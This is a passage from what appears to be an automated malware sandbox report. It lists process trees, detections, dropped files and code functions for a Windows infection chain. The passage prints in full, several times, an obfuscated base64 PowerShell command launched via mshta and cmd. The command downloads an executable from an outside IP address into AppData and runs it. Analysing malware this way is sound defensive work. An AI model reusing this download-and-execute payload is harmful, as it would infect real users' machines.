                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Suspicious command line found
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00014B37 LoadLibraryA,GetProcAddress,12_2_00014B37
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00A956D2 push esp; ret 3_2_00A95711
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0001C508 push A30001BAh; retn 0001h12_2_0001C50D
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00038945 push ecx; ret 12_2_00038958
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041E85A push cs; ret 13_2_0041E85D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041A963 push edi; retf 13_2_0041A96E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00411BB0 pushfd ; ret 13_2_00411BB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_0041EC21 push 00000043h; iretd 13_2_0041EC23
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00403430 push eax; ret 13_2_00403432
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00414483 push edi; retf 13_2_0041448E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_00418566 push esp; ret 13_2_00418567
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_004015D0 push esp; ret 13_2_004015D2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A309AD push ecx; mov dword ptr [esp], ecx13_2_03A309B6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4FFAB push es; retf 15_2_06A5007E
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A3F785 push B53FFD23h; retf 15_2_06A3F78A
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A46CE8 pushfd ; ret 15_2_06A46CE9
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A495BB push edi; retf 15_2_06A495C6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A53D59 push 00000043h; iretd 15_2_06A53D5B
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4FA9B push edi; retf 15_2_06A4FAA6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4E0A0 push 0000007Eh; retf 15_2_06A4E0AF
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4D860 pushad ; ret 15_2_06A4D873
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A4D85D push ecx; ret 15_2_06A4D85E
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeCode function: 15_2_06A53992 push cs; ret 15_2_06A53995
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\igcc.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_000148D7
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00095376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00095376
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00033187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00033187
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
